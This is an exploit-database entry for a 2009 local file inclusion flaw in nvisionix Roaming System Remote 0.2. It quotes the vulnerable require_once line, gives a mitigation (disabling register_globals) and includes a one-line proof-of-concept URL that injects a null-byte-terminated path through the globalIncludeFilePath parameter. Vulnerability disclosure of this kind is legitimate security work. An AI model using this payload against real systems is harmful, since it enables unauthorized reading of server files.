header-logo
Suggest Exploit
vendor:
irsr
by:
Treasure Priyamal
7.5
CVSS
HIGH
Local File Inclusion (LFI)
98
CWE
Product Name: irsr
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:nvisionix:irsr
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

nvisionix Roaming System Remote metasys 0.2 LFI Vulnerability

There is a vulnerability in almost every file directory, for example in the system/default.php file, where a malicious user can exploit the require_once ($globalIncludeFilePath) statement to inject malicious code into the system.

Mitigation:

Disable the register_globals setting in the php.ini configuration file.
Source

Exploit-DB raw data:

nvisionix Roaming System Remote metasys 0.2 LFI Vulnerability

 
Site ................... :	http://sourceforge.net/projects/irsr/
Download ............... :	http://space.dl.sourceforge.net/project/irsr/irsr/irsr-0.2/irsr-0.2.ZIP 
Author ................. :	Treasure Priyamal
Contact ................ :	treasure[at]treasuresec.com

Note : Successful exploitation requires that "register_globals" is enabled. 	
 
========================================================================
 
Description:
 
Your own portable PC system built by integrating existing Open Source components.
 This mobile metasystem utilizes the internet's web hosting resources and is accessed 
 via any web browser enabled appliance from your home, work, school, library, cafes, etc
 
========================================================================
 
*************************************************
[!]This other sample vuln c0de which affected to LFI [!]
*************************************************

There is a vulnerability in almost every file directory , for example in this Directory file:

[-] system/default.php

require_once ($globalIncludeFilePath);			// System's global include file.

-=[ P0C LFI ]=-

http://localhost/irsr/authenticate/sessions.php?globalIncludeFilePath=[LFI]%00
========================================================================